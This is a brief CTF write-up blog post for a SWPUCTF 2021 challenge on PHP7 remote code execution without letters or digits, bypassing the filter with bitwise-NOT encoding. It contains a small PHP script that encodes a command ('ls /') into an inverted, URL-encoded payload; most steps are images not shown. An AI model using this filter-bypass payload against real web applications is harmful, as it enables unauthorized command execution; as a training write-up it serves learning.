SWPUCTF 2021 新生赛 | 无数字字母RCE - 取反绕过 | PHP7 | 取反绕过

题目

image

无数字字母RCE PHP版本是php7

image

这里我们实验取反的方法去进行绕过

<?php 
  $payload = "ls /"; // 要编码的函数名称
  echo "~";
  for ($i = 0; $i < strlen($payload); $i++) {
   echo "%" . bin2hex(~$payload[$i]);
  }
?>

image
image
image
image

成功得到flag


参考连接:https://www.qwesec.com/2024/03/noLettersOrNumbersRCE.html#PHP7下的问题解决


###### ----------------补充------------------------

image
image
image


image

posted @ 2025-12-13 11:23  Dragon_Roar  阅读(9)  评论(0)    收藏  举报